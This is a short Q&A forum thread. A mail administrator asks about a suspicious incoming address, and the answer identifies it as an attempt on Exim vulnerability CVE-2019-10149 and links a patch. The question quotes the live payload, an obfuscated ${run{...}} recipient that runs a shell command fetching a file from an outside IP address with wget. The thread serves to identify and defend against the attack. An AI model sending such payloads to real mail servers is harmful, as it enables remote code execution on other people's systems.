caught email exploit attempt -- info requested -- mail to root+${...}@host

Question

I received an email to the address below that is an apparent exploit attempt. Does anyone have details about the specific exploit so I can make sure I am patched/not exposed:

root+${run{x2fbinx2fsht-ctx22wgetx2065.181.120.163x2fstfinracux22}}@mymailserver.example.com

Answer 1

This appears to be an attempt to exploit the recent Exim MTA Vulnerability, CVE-2019-10149.

There is a patch for Exim4 to address this issue.

NIST Reference:

https://nvd.nist.gov/vuln/detail/CVE-2019-10149